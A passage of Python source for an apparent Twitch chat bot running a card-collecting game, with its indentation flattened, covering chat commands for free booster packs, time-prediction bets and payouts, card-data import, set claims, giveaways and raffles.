return
# can they actually open it?
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you can't open a free pack with an open booster! !booster show to check it." %
tags['display-name'], isWhisper)
return
# all good
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, args[1], False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
cur.execute("UPDATE freepacks SET remaining = remaining - 1 WHERE userid = %s AND boostername = %s", [tags['user-id'], args[1]])
self.message(channel, "%s, you open a free %s booster: %s/booster?user=%s" % (tags['display-name'], result[1], config["siteHost"], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % args[1]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error opening your free pack, please try again later.",
isWhisper)
return
return
else:
with db.cursor() as cur:
cur.execute("SELECT boostername, remaining FROM freepacks WHERE userid = %s AND remaining > 0", [tags['user-id']])
freepacks = cur.fetchall()
if len(freepacks) == 0:
self.message(channel, "%s, you don't have any free pack entitlements right now." % tags['display-name'], isWhisper)
else:
freeStr = ", ".join("%s x%d" % (fp[0], fp[1]) for fp in freepacks)
self.message(channel, "%s, your current free packs: %s. !freepacks open <name> to open one." % (tags['display-name'], freeStr), isWhisper)
return
if command == "bet":
if isWhisper:
self.message(channel, "You can't use bet commands over whisper.", isWhisper)
return
if len(args) < 1:
self.message(channel,
"Usage: !bet <time> OR !bet status OR (as channel owner) !bet open OR !bet start OR !bet end OR !bet cancel OR !bet results OR !bet forcereset",
isWhisper)
return
# check restrictions
with db.cursor() as cur:
cur.execute("SELECT betsBanned, forceresetsBanned FROM channels WHERE name = %s", [channel[1:]])
restrictions = cur.fetchone()
if restrictions is None:
# this shouldn't ever happen, but just in case...
self.message(channel, "This isn't a Waifu TCG channel. No can do.", isWhisper)
return
if restrictions[0] != 0:
self.message(channel, "Bets are currently banned in this channel.")
return
canAdminBets = sender in superadmins or (sender in admins and isMarathonChannel)
isBroadcaster = str(tags["badges"]).find("broadcaster") > -1
canManageBets = canAdminBets or isBroadcaster
bet = parseBetTime(args[0])
if bet:
if sender == channel[1:]:
self.message(channel, "You can't bet in your own channel, sorry!", isWhisper)
return
open = placeBet(channel, tags["user-id"], bet["total"])
if open:
self.message(channel,
"Successfully entered {name}'s bet: {h}h {min}min {s}s {ms}ms".format(
h=bet["hours"],
min=bet["minutes"],
s=bet["seconds"],
ms=bet["ms"],
name=tags['display-name']),
isWhisper)
else:
self.message(channel, "The bets aren't open right now, sorry!", isWhisper)
return
else:
subcmd = str(args[0]).lower()
if canManageBets and subcmd == "open":
if openBet(channel):
self.message(channel, "Bets are now open! Use !bet HH:MM:SS(.ms) to submit your bet!")
else:
self.message(channel,
"There is already a prediction contest in progress in your channel! Use !bet status to check what to do next!")
return
elif canManageBets and subcmd == "start":
confirmed = args[-1].lower() == "yes"
try:
startBet(channel, confirmed)
self.message(channel, "Taking current time as start time! Good Luck! Bets are now closed.")
except NotEnoughBetsException:
self.message(channel, "WARNING: This bet does not currently have enough participants to be eligible for payout. To start anyway, use !bet start yes")
except NotOpenLongEnoughException:
self.message(channel, "You must wait at least %d minutes after opening a bet to start it." % int(config["betMinimumMinutesOpen"]))
except NoBetException:
self.message(channel,
"There wasn't an open prediction contest in your channel! Use !bet status to check current contest status.")
return
elif canManageBets and subcmd == "end":
resultData = endBet(str(channel).lower())
if resultData is None:
self.message(channel,
"There wasn't a prediction contest in progress in your channel! Use !bet status to check current contest status.")
else:
formattedTime = formatTimeDelta(resultData["result"])
winners = resultData["winners"]
winnerNames = []
for n in range(3):
winnerNames.append(winners[n]["name"] if len(winners) > n else "No-one")
self.message(channel,
"Contest has ended in {time}! The top 3 closest were: {first}, {second}, {third}".format(
time=formattedTime, first=winnerNames[0], second=winnerNames[1],
third=winnerNames[2]))
if not canAdminBets and len(winners) >= int(config["betMinimumEntriesForPayout"]):
# notify the discordhook of the new bet completion
chanStr = channel[1:].lower()
discordArgs = {"channel": chanStr, "time": formattedTime, "link": "https://twitch.tv/" + chanStr}
discordbody = {
"username": "WTCG Admin",
"content" : "A bet has just finished in {channel} with a time of {time}. Check results and consider payout at <{link}>.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
return
elif canManageBets and subcmd == "cancel":
if cancelBet(channel):
self.message(channel,
"Cancelled the current prediction contest! Start a new one with !bet open.")
else:
self.message(channel,
"There was no open or in-progress prediction contest in your channel! Start a new one with !bet open.")
return
elif subcmd == "status":
# check for most recent betting
cur = db.cursor()
cur.execute(
"SELECT id, status, startTime, endTime FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None:
if canManageBets:
self.message(channel,
"No time prediction contests have been done in this channel yet. Use !bet open to open one.")
else:
self.message(channel, "No time prediction contests have been done in this channel yet.")
elif betRow[1] == 'cancelled':
if canManageBets:
self.message(channel,
"No time prediction contest in progress. The most recent contest was cancelled. Use !bet open to open a new one.")
else:
self.message(channel,
"No time prediction contest in progress. The most recent contest was cancelled.")
else:
cur.execute("SELECT COUNT(*) FROM placed_bets WHERE betid = %s", [betRow[0]])
numBets = cur.fetchone()[0]
cur.execute("SELECT bet FROM placed_bets WHERE userid = %s AND betid = %s",
[tags["user-id"], betRow[0]])
placedBets = cur.fetchall()
placedBet = None if len(placedBets) == 0 else placedBets[0][0]
hasBet = placedBet is not None
if betRow[1] == 'open':
if canManageBets:
if hasBet:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer. Your bet currently is %s" % (
numBets, formatTimeDelta(placedBet)))
elif not isBroadcaster:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer. You have not bet yet." % numBets)
else:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer." % numBets)
else:
if hasBet:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. Your bet currently is %s" % (
numBets, formatTimeDelta(placedBet)))
else:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. You have not bet yet." % numBets)
elif betRow[1] == 'started':
elapsed = current_milli_time() - betRow[2]
formattedTime = formatTimeDelta(elapsed)
if canManageBets:
if hasBet:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results. Your bet is %s" % (
formattedTime, numBets, formatTimeDelta(placedBet)))
elif not isBroadcaster:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results. You did not bet." % (
formattedTime, numBets))
else:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results." % (
formattedTime, numBets))
else:
if hasBet:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. Your bet is %s" % (
formattedTime, numBets, formatTimeDelta(placedBet)))
else:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. You did not bet." % (
formattedTime, numBets))
else:
formattedTime = formatTimeDelta(betRow[3] - betRow[2])
paidOut = " and has been paid out" if betRow[1] == 'paid' else ""
if canManageBets:
self.message(channel,
"No time prediction contest in progress. The most recent contest ended in %s with %d bets placed%s. Use !bet results to see full results or !bet open to open a new one." % (
formattedTime, numBets, paidOut))
else:
self.message(channel,
"No time prediction contest in progress. The most recent contest ended in %s with %d bets placed%s." % (
formattedTime, numBets, paidOut))
cur.close()
return
elif canManageBets and subcmd == "results":
cur = db.cursor()
cur.execute("SELECT id, status FROM bets WHERE channel = %s AND `status` != 'open' ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None:
self.message(channel, "No time prediction contests have been done in this channel yet.",
isWhisper)
elif betRow[1] == 'cancelled':
self.message(channel, "The most recent contest in this channel was cancelled.", isWhisper)
elif betRow[1] == 'open' or betRow[1] == 'started':
self.message(channel,
"There is a contest currently in progress in this channel, check !bet status.",
isWhisper)
else:
resultData = getBetResults(betRow[0])
if resultData is None:
self.message(channel, "Error retrieving results.", isWhisper)
cur.close()
return
formattedTime = formatTimeDelta(resultData["result"])
messages = ["The most recent contest finished in %s." % formattedTime]
if len(resultData["winners"]) == 0:
messages[0] += " There were no bets placed."
else:
messages[0] += " Results: "
place = 0
for row in resultData["winners"]:
place += 1
formattedDelta = ("-" if row["timedelta"] < 0 else "+") + formatTimeDelta(
abs(row["timedelta"]))
formattedBet = formatTimeDelta(row["bet"])
entry = "({place}) {name} - {time} ({delta}); ".format(place=place,
name=row["name"],
time=formattedBet,
delta=formattedDelta)
if len(entry) + len(messages[-1]) > 400:
messages.append(entry)
else:
messages[-1] += entry
for message in messages:
self.message(channel, message, isWhisper)
cur.close()
return
elif subcmd == "forcereset" and canManageBets:
# change a started bet to open, preserving all current bets made
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] != 'started':
self.message(channel, "There is no bet in progress in this channel.", isWhisper)
else:
if '#' + sender == channel:
# own channel, check limit and restriction
if restrictions[1] != 0:
self.message(channel, "This channel is banned from using self forcereset at the present time.")
return
invocation = current_milli_time()
period = invocation - int(config["betForceResetPeriod"])
cur.execute("SELECT COUNT(*), MIN(`timestamp`) FROM forceresets WHERE channel = %s AND `timestamp` > %s", [channel, period])
frData = cur.fetchone()
if frData[0] >= int(config["betForceResetLimit"]):
nextUse = int(frData[1]) + int(config["betForceResetPeriod"]) - invocation
a = datetime.timedelta(milliseconds=nextUse, microseconds=0)
datestring = "{0}".format(a).split(".")[0]
self.message(channel, "You are currently out of self forceresets. Your next one will be available in %s." % datestring)
return
cur.execute("INSERT INTO forceresets (channel, user, `timestamp`) VALUES(%s, %s, %s)", [channel, tags['user-id'], invocation])
cur.execute("UPDATE bets SET status = 'open', startTime = NULL WHERE id = %s",
[betRow[0]])
self.message(channel, "Reset the bet in progress in this channel to open status.",
isWhisper)
return
elif subcmd == "changetime" and canAdminBets:
# change the completion time of a completed bet
if len(args) < 2:
self.message(channel, "Usage: !bet changetime <time> (same format as !bet)", isWhisper)
return
ctdata = parseBetTime(args[1])
if not ctdata:
self.message(channel, "Usage: !bet changetime <time> (same format as !bet)", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s AND `status` != 'open' ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] != 'completed':
self.message(channel, "There is no just-completed bet in this channel.", isWhisper)
else:
cur.execute("UPDATE bets SET endTime = startTime + %s WHERE id = %s",
[ctdata["total"], betRow[0]])
self.message(channel,
"Successfully changed end time to: {h}h {min}min {s}s {ms}ms".format(
h=ctdata["hours"],
min=ctdata["minutes"],
s=ctdata["seconds"],
ms=ctdata["ms"]),
isWhisper)
return
elif subcmd == "forceenter" and canAdminBets:
if isMarathonChannel:
self.message(channel, "No forceenters allowed in the marathon channel.", isWhisper)
return
# enter another user into a bet
if len(args) < 3:
self.message(channel, "Usage: !bet forceenter <username> <time>", isWhisper)
return
tdata = parseBetTime(args[2])
if not tdata:
self.message(channel, "Usage: !bet forceenter <username> <time>", isWhisper)
return
enteruser = args[1].strip().lower()
if enteruser == sender:
self.message(channel, "You can't force-enter your own time, pls.", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] not in ("open", "started"):
self.message(channel,
"There is not a bet in this channel that is eligible for force-entries.",
isWhisper)
else:
# check username
cur.execute("SELECT id FROM users WHERE name = %s", [enteruser])
enteridrow = cur.fetchone()
if enteridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
enterid = int(enteridrow[0])
cur.execute(
"REPLACE INTO placed_bets (betid, userid, bet, updated) VALUE (%s, %s, %s, %s)",
[betRow[0], enterid, tdata["total"], current_milli_time()])
self.message(channel,
"Successfully entered {user}'s bet: {h}h {min}min {s}s {ms}ms".format(
h=tdata["hours"],
min=tdata["minutes"],
s=tdata["seconds"],
ms=tdata["ms"],
user=enteruser),
isWhisper)
return
elif subcmd == "payout" and canAdminBets:
# pay out most recent bet in this channel
cur = db.cursor()
cur.execute("SELECT COALESCE(MAX(paidAt), 0) FROM bets WHERE channel = %s LIMIT 1", [channel])
lastPayout = cur.fetchone()[0]
currTime = current_milli_time()
if lastPayout > currTime - 79200000 and not isMarathonChannel:
a = datetime.timedelta(milliseconds=int(lastPayout + 79200000 - currTime), microseconds=0)
datestring = "{0}".format(a).split(".")[0]
self.message(channel, "Bet payout may be used again in this channel in %s." % datestring,
isWhisper)
cur.close()
return
cur.execute(
"SELECT id, status, endTime FROM bets WHERE channel = %s AND status IN('completed', 'paid', 'cancelled') ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or (betRow[1] != 'paid' and betRow[1] != 'completed'):
self.message(channel,
"There is no pending time prediction contest to be paid out for this channel.",
isWhisper)
elif betRow[1] == 'paid':
self.message(channel, "The most recent contest in this channel was already paid out.",
isWhisper)
else:
# do the thing
resultData = getBetResults(betRow[0])
if resultData is None:
self.message(channel, "Error retrieving results.", isWhisper)
cur.close()
return
numEntries = len(resultData["winners"])
if numEntries < int(config["betMinimumEntriesForPayout"]):
self.message(channel, "This contest had less than %d entrants, no payout." % int(config["betMinimumEntriesForPayout"]), isWhisper)
cur.close()
return
# calculate first run of prizes
minPrize = int(config["betMinPrize"])
maxPrize = int(config["betMaxPrize"]) * min(1 + numEntries/10, 2)
bbReward = int(config["baseBroadcasterReward"])
canWinBigPrizes = resultData["result"] >= 1800000
whispers = []
prizeStrings = []
place = 0
for winner in resultData["winners"]:
place += 1
if abs(winner["timedelta"]) < 1000 and canWinBigPrizes:
booster = config["sameSecondBooster"]
if abs(winner["timedelta"]) < 10:
booster = config["almostExactBooster"]
giveFreeBooster(winner["id"], booster)
msg = "You won a %s booster from the bet in %s's channel. Open it in any chat with !freepacks open %s" % (booster, channel[1:], booster)
prizeStrings.append("%s - %s pack" % (winner["name"], booster))
cur.execute("UPDATE placed_bets SET prizePack = %s WHERE betid = %s AND userid = %s",
[booster, betRow[0], winner["id"]])
else:
pudding = minPrize + (maxPrize - minPrize) * (numEntries - place) / (numEntries - 1) / (1.4 if place > numEntries / 2 else 1)
if place == 1:
pudding *= 1.3
if isMarathonChannel and booleanConfig("marathonBetBoost"):
pudding *= 1.5
if canWinBigPrizes and abs(winner["timedelta"]) < resultData["result"] / 120:
pudding *= 1.5
if winner["bet"] < resultData["result"] / 2 or winner["bet"] > resultData["result"] * 2:
pudding *= 0.5
pudding = round(pudding)
addPudding(winner["id"], pudding)
msg = "You won %d pudding from the bet in %s's channel. Check and spend it with !pudding" % (pudding, channel[1:])
prizeStrings.append("%s - %d pudding" % (winner["name"], pudding))
cur.execute("UPDATE placed_bets SET prizePudding = %s WHERE betid = %s AND userid = %s",
[pudding, betRow[0], winner["id"]])
whispers.append(('#' + winner["name"], msg))
# broadcaster prize
# run length in hours * 30, rounded to nearest whole pudding
runHours = resultData["result"] / 3600000.0
bcPrize = round(min(max(runHours, 1) * bbReward, int(config["maxBroadcasterReward"])))
capped = False
if not isMarathonChannel:
cur.execute("SELECT COALESCE(SUM(paidBroadcaster), 0) FROM bets WHERE status='paid' AND SUBSTRING(FROM_UNIXTIME(startTime/1000),1,7)=SUBSTRING(NOW(),1,7) AND channel = %s", [channel])
puddingMonth = cur.fetchone()[0] or 0
if puddingMonth + bcPrize > int(config["maxMonthlyBCReward"]):
bcPrize = int(config["maxMonthlyBCReward"]) - puddingMonth
capped = True
prizeStrings.append("%s (broadcaster) - %d pudding%s" % (channel[1:], bcPrize, " (monthly cap reached)" if capped else ""))
whispers.append((channel, "You were rewarded %d pudding%s for running your recent bet. Check and spend it with !pudding" % (bcPrize, " (monthly cap reached)" if capped else "")))
# skip using addPudding to save a database lookup
cur.execute("UPDATE users SET puddingCurrent = puddingCurrent + %s WHERE name = %s", [bcPrize, channel[1:]])
# start cooldown for next bet payout at max(endTime, lastPayout + 22h)
payoutTime = min(max(betRow[2], lastPayout + 79200000), current_milli_time())
cur.execute(
"UPDATE bets SET status = 'paid', paidBroadcaster = %s, paidAt = %s WHERE id = %s",
[bcPrize, payoutTime, betRow[0]])
messages = ["Paid out the following prizes: "]
first = True
for prize in prizeStrings:
msg = prize if first else "; " + prize
if len(messages[-1] + msg) > 400:
messages.append(prize)
else:
messages[-1] += msg
first = False
for message in messages:
self.message(channel, message, isWhisper)
# alert each person individually as well
# sent after the messages to the channel itself deliberately
for whisper in whispers:
self.message(whisper[0], whisper[1], True)
cur.close()
return
else:
self.message(channel,
"Usage: !bet <time> OR !bet status OR (as channel owner) !bet open OR !bet start OR !bet end OR !bet cancel OR !bet results",
isWhisper)
return
if command == "import" and sender in superadmins:
if len(args) != 1:
self.message(channel, "Usage: !import url", isWhisper)
return
url = args[0]
if "pastebin.com" in url and "/raw/" not in url:
url = url.replace("pastebin.com/", "pastebin.com/raw/")
try:
r = requests.get(url)
data = r.text.splitlines()
lineno = 0
errorlines = []
addwaifus = []
for line in data:
lineno += 1
if not line.strip():
continue
match = waifu_regex.fullmatch(line.strip())
if match:
addwaifus.append(match.groupdict())
else:
errorlines.append(lineno)
if len(errorlines) > 0:
self.message(channel,
"Error processing waifu data from lines: %s. Please fix formatting and try again." % ", ".join(
str(lineno) for lineno in errorlines), isWhisper)
return
else:
cur = db.cursor()
cur.executemany("INSERT INTO waifus (Name, image, base_rarity, series) VALUES(%s, %s, %s, %s)",
[(waifu["name"], waifu["link"], int(waifu["rarity"]), waifu["series"].strip())
for waifu in addwaifus])
cur.close()
self.message(channel, "Successfully added %d waifus to the database." % len(addwaifus),
isWhisper)
return
except Exception:
self.message(channel, "Error loading waifu data.", isWhisper)
logger.error("Error importing waifus: %s", str(sys.exc_info()))
return
if command == "sets" or command == "set":
if len(args) == 0:
self.message(channel,
"Available sets: %s/sets?user=%s . !sets claim to claim all sets you are eligible for." % (
config["siteHost"], sender.lower()), isWhisper=isWhisper)
return
subcmd = args[0].lower()
if subcmd == "rarity":
self.message(channel,
"Rarity sets have been suspended for the time being. They may return in some form at some point.",
isWhisper)
return
elif subcmd == "claim":
cur = db.cursor()
claimed = 0
# normal sets
cur.execute(
"SELECT DISTINCT sets.id, sets.name, sets.rewardPudding FROM sets WHERE sets.claimed_by IS NULL AND sets.id NOT IN (SELECT DISTINCT setID FROM set_cards LEFT OUTER JOIN (SELECT * FROM has_waifu JOIN users ON has_waifu.userid = users.id WHERE users.id = %s) AS a ON waifuid = cardID JOIN sets ON set_cards.setID = sets.id JOIN waifus ON cardID = waifus.id WHERE a.name IS NULL)",
[tags["user-id"]])
rows = cur.fetchall()
for row in rows:
claimed += 1
cur.execute("UPDATE sets SET claimed_by = %s, claimed_at = %s WHERE sets.id = %s",
[tags["user-id"], current_milli_time(), row[0]])
addPudding(tags["user-id"], int(row[2]))
badgeid = addBadge(row[1], config["setBadgeDescription"], config["setBadgeDefaultImage"])
giveBadge(tags['user-id'], badgeid)
self.message(channel,
"Successfully claimed the Set {set} and rewarded {user} with {reward} pudding!".format(
set=row[1], user=tags["display-name"], reward=row[2]), isWhisper)
cur.execute(
"SELECT waifus.name FROM set_cards INNER JOIN waifus ON set_cards.cardID = waifus.id WHERE setID = %s",
[row[0]])
cards = [sc[0] for sc in cur.fetchall()]
threading.Thread(target=sendSetAlert,
args=(channel, tags["display-name"], row[1], cards, row[2])).start()
if claimed == 0:
self.message(channel,
"You do not have any completed sets that are available to be claimed. !sets to check progress.",
isWhisper=isWhisper)
return
cur.close()
return
else:
self.message(channel, "Usage: !sets OR !sets claim", isWhisper=isWhisper)
return
if command == "debug" and sender in superadmins:
if debugMode:
updateBoth("Hyperdimension Neptunia", "Testing title updates.")
self.message(channel, "Title and game updated for testing purposes")
else:
self.message(channel, "Debug mode is off. Debug command disabled.")
return
if command == "givefreepack" and sender in superadmins:
if len(args) < 2:
self.message(channel, "Usage: !givefreepack <username> <booster name> [<amount> (default 1)]", isWhisper)
return
if len(args) >= 3:
try:
amount = int(args[2])
except ValueError:
self.message(channel, "Invalid amount specified.", isWhisper)
return
else:
amount = 1
with db.cursor() as cur:
cur.execute("SELECT id, name FROM users WHERE name = %s", [args[0]])
userData = cur.fetchone()
if userData is None:
self.message(channel, "Invalid username specified.", isWhisper)
return
cur.execute("SELECT COUNT(*) FROM boosters WHERE name = %s", [args[1]])
if cur.fetchone()[0] == 0:
self.message(channel, "Invalid booster name specified.", isWhisper)
return
giveFreeBooster(userData[0], args[1], amount)
if amount > 1:
self.message('#%s' % userData[1], "You were given %d free %s packs by an admin. Check them using !freepacks" % (amount, args[1]), True)
else:
self.message('#%s' % userData[1], "You were given a free %s pack by an admin. Open it using !freepacks open %s" % (args[1], args[1]), True)
self.message(channel, "Successfully gave %d %s packs to %s." % (amount, args[1], userData[1]), isWhisper)
return
if command == "nepcord":
self.message(channel,
"To join the discussion in the official Waifu TCG Discord Channel, go to %s/discord" %
config["siteHost"], isWhisper=isWhisper)
return
if command == "giveaway":
if booleanConfig("marathonOnlyGiveaway") and not isMarathonChannel:
return
cur = db.cursor()
if len(args) == 0 or args[0].lower() == 'enter':
# check for a giveaway to enter
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None or giveaway_info[1] == 'closed':
self.message(channel, "There is not an open giveaway right now.", isWhisper)
cur.close()
return
# look for our own entry already existing
cur.execute("SELECT COUNT(*) FROM giveaway_entries WHERE giveawayid = %s AND userid = %s",
[giveaway_info[0], tags['user-id']])
entry_count = cur.fetchone()[0] or 0
if entry_count != 0:
self.message(channel,
"%s -> You have already entered the current giveaway." % tags["display-name"],
isWhisper)
cur.close()
return
# add an entry
cur.execute("INSERT INTO giveaway_entries (giveawayid, userid, timestamp) VALUES(%s, %s, %s)",
[giveaway_info[0], tags['user-id'], current_milli_time()])
self.message(channel,
"%s -> You have been entered into the current giveaway." % tags["display-name"],
isWhisper)
cur.close()
return
if sender not in superadmins:
return
subcmd = args[0].lower()
if subcmd == 'open':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is not None and giveaway_info[1] != 'closed':
self.message(channel, "There is already an open giveaway right now.", isWhisper)
cur.close()
return
# create a new giveaway
cur.execute("INSERT INTO giveaways (opened, creator, status) VALUES(%s, %s, 'open')",
[current_milli_time(), tags['user-id']])
self.message(channel, "Started a new giveaway!", isWhisper)
cur.close()
return
if subcmd == 'close':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None or giveaway_info[1] == 'closed':
self.message(channel, "There is not an open giveaway right now.", isWhisper)
cur.close()
return
cur.execute("UPDATE giveaways SET closed = %s, status = 'closed' WHERE id = %s",
[current_milli_time(), giveaway_info[0]])
self.message(channel, "Closed entries for the current giveaway!", isWhisper)
cur.close()
return
if subcmd == 'pick':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None:
self.message(channel, "There hasn't been a giveaway yet.", isWhisper)
cur.close()
return
if len(args) < 2:
self.message(channel, "Usage: !giveaway pick <amount of winners>", isWhisper)
cur.close()
return
try:
num_winners = int(args[1])
except Exception:
self.message(channel, "Usage: !giveaway pick <amount of winners>", isWhisper)
cur.close()
return
cur.execute(
"SELECT giveaway_entries.userid, users.name FROM giveaway_entries INNER JOIN users ON giveaway_entries.userid = users.id WHERE giveaway_entries.giveawayid = %s AND giveaway_entries.winner = 0 ORDER BY RAND() LIMIT " + str(
num_winners), [giveaway_info[0]])
winners = cur.fetchall()
if len(winners) != num_winners:
self.message(channel,
"There aren't enough entrants left to pick %d more winners! Try %d or fewer." % (
num_winners, len(winners)), isWhisper)
cur.close()
return
winner_ids = [row[0] for row in winners]
inTemplate = ",".join(["%s"] * len(winner_ids))
winner_names = ", ".join(row[1] for row in winners)
cur.execute(
"UPDATE giveaway_entries SET winner = 1, when_won = %s WHERE giveawayid = %s AND userid IN (" + inTemplate + ")",
[current_milli_time(), giveaway_info[0]] + winner_ids)
self.message(channel, "Picked %d winners for the giveaway: %s!" % (num_winners, winner_names),
isWhisper)
cur.close()
return
if command == "raffle":
with db.cursor() as cur:
cur.execute("SELECT id, status, ticket_price, max_tickets FROM raffles ORDER BY id DESC LIMIT 1")
raffle_info = cur.fetchone()
if len(args) == 0:
# check for info
if raffle_info is None or raffle_info[1] == 'done':
self.message(channel, "No raffle is open at this time.", isWhisper)
return
else:
cur.execute(
"SELECT num_tickets, num_winners, won_grand FROM raffle_tickets WHERE raffleid = %s AND userid = %s",
[raffle_info[0], tags['user-id']])
my_tickets = cur.fetchone()
if raffle_info[1] == 'open':
if my_tickets is None:
self.message(channel,
"There is a raffle currently open. You can buy up to %d tickets for %d points each using !raffle buy <amount>. You don't have any tickets right now." % (
raffle_info[3], raffle_info[2]), isWhisper)
elif my_tickets[0] < raffle_info[3]:
self.message(channel,
"There is a raffle currently open. You have bought %d tickets so far. You can buy up to %d more for %d points each using !raffle buy <amount>." % (
my_tickets[0], raffle_info[3] - my_tickets[0], raffle_info[2]),
isWhisper)
else:
self.message(channel,
"There is a raffle currently open. You are already at the limit of %d tickets." % (
raffle_info[3]), isWhisper)
else:
# raffle in process of drawing
if my_tickets is None:
self.message(channel,
"The current raffle is in the process of being drawn. Unfortunately, you didn't buy any tickets! Try again next raffle.")
else:
if my_tickets[2] != 0:
self.message(channel,
"The current raffle is in the process of being drawn. So far you have won %d minor prizes and a grand prize from your %d tickets!" % (
my_tickets[1] - 1, my_tickets[0]))
else:
self.message(channel,
"The current raffle is in the process of being drawn. So far, you have won %d minor prizes and no grand prize from your %d tickets." % (
my_tickets[1], my_tickets[0]))
return
subcmd = args[0].lower()
if subcmd == 'buy':
if raffle_info[1] != 'open':
self.message(channel,
"Raffle ticket purchases aren't open right now. Use !raffle to check the overall status.")
return
if len(args) < 2:
self.message(channel, "Usage: !raffle buy <amount>", isWhisper)
return
try:
tickets = int(args[1])
assert tickets >= 0
except Exception:
self.message(channel, "Invalid amount of tickets specified.", isWhisper)
return
cur.execute(
"SELECT num_tickets, num_winners, won_grand FROM raffle_tickets WHERE raffleid = %s AND userid = %s",
[raffle_info[0], tags['user-id']])
my_tickets = cur.fetchone()
can_buy = raffle_info[3] if my_tickets is None else raffle_info[3] - my_tickets[0]
cost = tickets * raffle_info[2]
if tickets > can_buy:
if can_buy == 0:
self.message(channel,
"%s, you're already at the maximum of %d tickets for this raffle. Please wait for the drawing." % (
tags['display-name'], raffle_info[3]), isWhisper)
else:
self.message(channel,
"%s, you can only buy %d more tickets for this raffle. Please adjust your purchase." % (
tags['display-name'], can_buy), isWhisper)
return
if not hasPoints(tags['user-id'], cost):
self.message(channel, "%s, you don't have the %d points required to buy %d tickets." % (
tags['display-name'], cost, tickets), isWhisper)
return
# okay, buy the tickets
addPoints(tags['user-id'], -cost)
if my_tickets is None:
cur.execute(
"INSERT INTO raffle_tickets (raffleid, userid, num_tickets, created) VALUES(%s, %s, %s, %s)",
[raffle_info[0], tags['user-id'], tickets, current_milli_time()])
else:
cur.execute(
"UPDATE raffle_tickets SET num_tickets = num_tickets + %s, updated = %s WHERE raffleid = %s AND userid = %s",
[tickets, current_milli_time(), raffle_info[0], tags['user-id']])
self.message(channel, "%s, you successfully bought %d raffle tickets for %d points." % (
tags['display-name'], tickets, cost), isWhisper)
return
if sender not in superadmins:
self.message(channel, "Usage: !raffle / !raffle buy <amount>", isWhisper)
return
if subcmd == 'open':
if raffle_info is not None and raffle_info[1] != 'done':
self.message(channel, "There is already an incomplete raffle right now.", isWhisper)
return
if len(args) < 3:
self.message(channel, "Usage: !raffle open <points per ticket> <max tickets>", isWhisper)
return
try:
points_per_ticket = int(args[1])
max_tickets = int(args[2])
assert max_tickets > 0 and max_tickets < 100
assert points_per_ticket >= 100
except Exception:
self.message(channel,
"Invalid arguments. Usage: !raffle open <points per ticket> <max tickets>",
isWhisper)
return
# create a new raffle
cur.execute(
"INSERT INTO raffles (opened, creator, status, ticket_price, max_tickets) VALUES(%s, %s, 'open', %s, %s)",
[current_milli_time(), tags['user-id'], points_per_ticket, max_tickets])
self.message(channel, "Started a new raffle!", isWhisper)
cur.close()
return
if subcmd == 'close':
if raffle_info is None or raffle_info[1] != 'open':
self.message(channel, "There is not an open raffle right now.", isWhisper)
return
cur.execute("UPDATE raffles SET closed = %s, status = 'drawing' WHERE id = %s",
[current_milli_time(), raffle_info[0]])
self.message(channel, "Closed ticket purchases for the current raffle!", isWhisper)
return
if subcmd == 'complete':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
cur.execute("UPDATE raffles SET status = 'done' WHERE id = %s",
[current_milli_time(), raffle_info[0]])
self.message(channel, "Closed drawing for the current raffle!", isWhisper)
return
if subcmd == 'pick' or subcmd == 'draw':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
if len(args) < 2:
self.message(channel, "Usage: !raffle pick <amount of winners>", isWhisper)
return
winners = []
try:
num_winners = int(args[1])
assert num_winners > 0
except Exception:
self.message(channel, "Usage: !raffle pick <amount of winners>", isWhisper)
return
for i in range(num_winners):
